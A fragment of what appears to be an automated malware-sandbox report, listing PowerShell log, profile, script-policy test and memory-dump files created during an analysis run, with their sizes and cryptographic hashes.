        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          2KB

          MD5

          627073ee3ca9676911bee35548eff2b8

          SHA1

          4c4b68c65e2cab9864b51167d710aa29ebdcff2e

          SHA256

          85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

          SHA512

          3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          b69fe8c181767d369e3e3c515148a716

          SHA1

          ed4bd904824f8cd154fbfcc50a4981309353c4d7

          SHA256

          f9a5e597ca3663f8f769fcb9fabdf1817c3e4e344bdc251f443a72afddbff178

          SHA512

          c9647f2c81d0d2e6758c97183f5304d7867b8b67e04f95ae30fe4e5d7d2675e494163ab7beb7fbf326023ea52b2406abda48c06942d04c320009de8dfd33647b

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          944B

          MD5

          1a9fa92a4f2e2ec9e244d43a6a4f8fb9

          SHA1

          9910190edfaccece1dfcc1d92e357772f5dae8f7

          SHA256

          0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

          SHA512

          5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h4jtnvjt.dtr.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • memory/2420-96-0x000002082C280000-0x000002082C28A000-memory.dmp

          Filesize

          40KB

          Download

        • memory/4512-84-0x000002B3B5880000-0x000002B3B58A2000-memory.dmp

          Filesize

          136KB

          Download